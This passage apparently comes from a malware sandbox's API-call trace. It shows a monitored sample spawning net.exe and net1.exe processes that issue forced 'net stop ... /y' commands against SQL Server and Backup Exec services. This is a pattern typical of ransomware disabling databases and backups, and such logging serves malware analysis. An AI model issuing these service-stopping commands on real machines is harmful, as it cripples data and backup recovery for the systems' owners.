_String2="SQLTELEMETRY$ECWDB2") returned 4 [0202.659] _wcsicmp (_String1="work", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0202.659] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0202.659] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY$ECWDB2") returned -3 [0202.659] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY$ECWDB2") returned -15 [0202.659] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0202.659] _wcsicmp (_String1="server", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.659] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY$ECWDB2") returned 5 [0202.659] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY$ECWDB2") returned 1 [0202.659] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0202.659] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY$ECWDB2") returned -18 [0202.659] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY$ECWDB2") returned -5 [0202.659] NetServiceControl (in: servername=0x0, service="SQLTELEMETRY$ECWDB2", opcode=0x0, arg=0x0, bufptr=0x13fe18 | out: bufptr=0x13fe18) returned 0x889 [0202.660] wcscpy_s (in: _Destination=0x80a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.660] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0202.660] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x80b338, nSize=0x800, Arguments=0x809dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0202.661] GetFileType (hFile=0x26c) returned 0x3 [0202.661] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x304020 [0202.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x304020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n/", lpUsedDefaultChar=0x0) returned 30 [0202.662] WriteFile (in: hFile=0x26c, lpBuffer=0x304020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x13fd58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fd58, lpOverlapped=0x0) returned 0 [0202.662] LocalFree (hMem=0x304020) returned 0x0 [0202.662] GetFileType (hFile=0x26c) returned 0x3 [0202.662] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3062c8 [0202.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3062c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n0", lpUsedDefaultChar=0x0) returned 2 [0202.662] WriteFile (in: hFile=0x26c, lpBuffer=0x3062c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fd58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fd58, lpOverlapped=0x0) returned 0 [0202.662] LocalFree (hMem=0x3062c8) returned 0x0 [0202.662] _ultow (in: _Dest=0x889, _Radix=1310088 | out: _Dest=0x889) returned="2185" [0202.662] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x80b338, nSize=0x800, Arguments=0x809dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0202.662] GetFileType (hFile=0x26c) returned 0x3 [0202.662] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3062c8 [0202.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3062c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0202.662] WriteFile (in: hFile=0x26c, lpBuffer=0x3062c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x13fd64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fd64, lpOverlapped=0x0) returned 0 [0202.662] LocalFree (hMem=0x3062c8) returned 0x0 [0202.662] GetFileType (hFile=0x26c) returned 0x3 [0202.662] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3062c8 [0202.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3062c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n0", lpUsedDefaultChar=0x0) returned 2 [0202.662] WriteFile (in: hFile=0x26c, lpBuffer=0x3062c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fd64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fd64, lpOverlapped=0x0) returned 0 [0202.662] LocalFree (hMem=0x3062c8) returned 0x0 [0202.663] NetApiBufferFree (Buffer=0x301c80) returned 0x0 [0202.663] NetApiBufferFree (Buffer=0x301c98) returned 0x0 [0202.663] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY$ECWDB2 /y" [0202.663] exit (_Code=2) Process: id = "196" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x698ae000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 369 os_tid = 0x588 Process: id = "197" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x69e35000" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "196" os_parent_pid = "0x55c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 370 os_tid = 0xbd0 [0202.798] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fa74 | out: lpSystemTimeAsFileTime=0x28fa74*(dwLowDateTime=0x42109bc0, dwHighDateTime=0x1d57a87)) [0202.798] GetCurrentProcessId () returned 0x7b8 [0202.798] GetCurrentThreadId () returned 0xbd0 [0202.798] GetTickCount () returned 0x116c543 [0202.798] QueryPerformanceCounter (in: lpPerformanceCount=0x28fa6c | out: lpPerformanceCount=0x28fa6c*=32308280351) returned 1 [0202.798] GetModuleHandleA (lpModuleName=0x0) returned 0x6d0000 [0202.798] __set_app_type (_Type=0x1) [0202.798] __p__fmode () returned 0x74eb31f4 [0202.799] __p__commode () returned 0x74eb31fc [0202.799] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x6dffe6) returned 0x0 [0202.799] __getmainargs (in: _Argc=0x6e9064, _Argv=0x6e906c, _Env=0x6e9068, _DoWildCard=0, _StartInfo=0x6e9024 | out: _Argc=0x6e9064, _Argv=0x6e906c, _Env=0x6e9068) returned 0 [0202.799] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.799] GetConsoleOutputCP () returned 0x1b5 [0202.799] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x6e9080 | out: lpCPInfo=0x6e9080) returned 1 [0202.799] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.802] sprintf_s (in: _DstBuf=0x28fa2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.802] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.804] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.804] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.804] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" [0202.804] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f7f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.804] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x88) returned 0x8a4c00 [0202.804] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.805] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28f9fc | out: Buffer=0x28f9fc*=0x8a1c98) returned 0x0 [0202.805] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28f9fc | out: Buffer=0x28f9fc*=0x8a1cb0) returned 0x0 [0202.805] _fileno (_File=0x74eb2900) returned -2 [0202.805] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.805] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.805] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.805] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.805] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.805] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.805] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.805] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.805] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.805] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.805] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.805] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.805] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.805] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.805] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.805] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.805] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.805] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.805] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.805] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.805] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.805] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0202.805] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0202.805] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0202.805] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0202.806] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0202.806] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0202.806] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -7 [0202.806] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -7 [0202.806] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -6 [0202.806] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -6 [0202.806] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -5 [0202.806] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -5 [0202.806] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0202.806] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 3 [0202.806] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 7 [0202.806] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 8 [0202.806] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 8 [0202.806] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0202.806] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -14 [0202.806] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0202.806] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0202.806] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 1 [0202.806] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0202.806] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0202.806] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0202.806] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0202.806] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0202.806] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0202.806] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 3 [0202.806] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -9 [0202.806] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0202.806] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0202.806] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0202.807] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0202.807] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 1 [0202.807] _wcsupr (in: _String="MSSQLFDLauncher$SYSTEM_BGC" | out: _String="MSSQLFDLAUNCHER$SYSTEM_BGC") returned="MSSQLFDLAUNCHER$SYSTEM_BGC" [0202.807] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8a54d8 [0202.809] GetServiceKeyNameW (in: hSCManager=0x8a54d8, lpDisplayName="MSSQLFDLAUNCHER$SYSTEM_BGC", lpServiceName=0x6eaaf0, lpcchBuffer=0x28f998 | out: lpServiceName="", lpcchBuffer=0x28f998) returned 0 [0202.810] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -12 [0202.810] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -14 [0202.810] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0202.810] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0202.810] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0202.810] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0202.810] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0202.810] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0202.810] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0202.810] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0202.810] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 3 [0202.810] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -9 [0202.810] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -1 [0202.810] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0202.810] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0202.810] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0202.810] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -1 [0202.810] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -12 [0202.810] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 1 [0202.810] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x28f994 | out: bufptr=0x28f994) returned 0x889 [0202.811] wcscpy_s (in: _Destination=0x6ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.811] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0202.812] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x6eb338, nSize=0x800, Arguments=0x6e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0202.813] GetFileType (hFile=0x26c) returned 0x3 [0202.813] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x8a3ca8 [0202.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x8a3ca8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0202.813] WriteFile (in: hFile=0x26c, lpBuffer=0x8a3ca8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x28f8d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8d4, lpOverlapped=0x0) returned 0 [0202.813] LocalFree (hMem=0x8a3ca8) returned 0x0 [0202.813] GetFileType (hFile=0x26c) returned 0x3 [0202.813] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8a62a0 [0202.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8a62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x8a", lpUsedDefaultChar=0x0) returned 2 [0202.813] WriteFile (in: hFile=0x26c, lpBuffer=0x8a62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f8d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8d4, lpOverlapped=0x0) returned 0 [0202.813] LocalFree (hMem=0x8a62a0) returned 0x0 [0202.813] _ultow (in: _Dest=0x889, _Radix=2685188 | out: _Dest=0x889) returned="2185" [0202.813] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x6eb338, nSize=0x800, Arguments=0x6e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0202.813] GetFileType (hFile=0x26c) returned 0x3 [0202.813] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x8a62a0 [0202.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x8a62a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0202.813] WriteFile (in: hFile=0x26c, lpBuffer=0x8a62a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x28f8e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8e0, lpOverlapped=0x0) returned 0 [0202.813] LocalFree (hMem=0x8a62a0) returned 0x0 [0202.813] GetFileType (hFile=0x26c) returned 0x3 [0202.813] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8a62a0 [0202.814] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8a62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x8a", lpUsedDefaultChar=0x0) returned 2 [0202.814] WriteFile (in: hFile=0x26c, lpBuffer=0x8a62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f8e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8e0, lpOverlapped=0x0) returned 0 [0202.814] LocalFree (hMem=0x8a62a0) returned 0x0 [0202.814] NetApiBufferFree (Buffer=0x8a1c98) returned 0x0 [0202.814] NetApiBufferFree (Buffer=0x8a1cb0) returned 0x0 [0202.814] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" [0202.814] exit (_Code=2) Process: id = "198" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6dbb3000" os_pid = "0xbc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 371 os_tid = 0x5cc Process: id = "199" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x61897000" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "198" os_parent_pid = "0xbc8" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 372 os_tid = 0xbb0 [0202.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bff7c | out: lpSystemTimeAsFileTime=0x2bff7c*(dwLowDateTime=0x42286980, dwHighDateTime=0x1d57a87)) [0202.951] GetCurrentProcessId () returned 0xbb4 [0202.951] GetCurrentThreadId () returned 0xbb0 [0202.951] GetTickCount () returned 0x116c5df [0202.951] QueryPerformanceCounter (in: lpPerformanceCount=0x2bff74 | out: lpPerformanceCount=0x2bff74*=32323615792) returned 1 [0202.952] GetModuleHandleA (lpModuleName=0x0) returned 0xec0000 [0202.952] __set_app_type (_Type=0x1) [0202.952] __p__fmode () returned 0x74eb31f4 [0202.952] __p__commode () returned 0x74eb31fc [0202.952] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xecffe6) returned 0x0 [0202.952] __getmainargs (in: _Argc=0xed9064, _Argv=0xed906c, _Env=0xed9068, _DoWildCard=0, _StartInfo=0xed9024 | out: _Argc=0xed9064, _Argv=0xed906c, _Env=0xed9068) returned 0 [0202.952] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.952] GetConsoleOutputCP () returned 0x1b5 [0202.952] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xed9080 | out: lpCPInfo=0xed9080) returned 1 [0202.953] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.955] sprintf_s (in: _DstBuf=0x2bff34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.956] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.958] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.958] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$BKUPEXEC /y" [0202.958] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bfd00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.958] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x70) returned 0x313c18 [0202.958] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.958] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bff04 | out: Buffer=0x2bff04*=0x311c78) returned 0x0 [0202.958] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bff04 | out: Buffer=0x2bff04*=0x311c90) returned 0x0 [0202.958] _fileno (_File=0x74eb2900) returned -2 [0202.958] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.958] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.958] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.958] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.958] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.958] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.959] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.959] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.959] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.959] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.959] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.959] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.959] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.959] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.959] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.959] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.959] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.959] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.959] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.959] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.959] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.959] _wcsicmp (_String1="stop", _String2="stop") returned 0 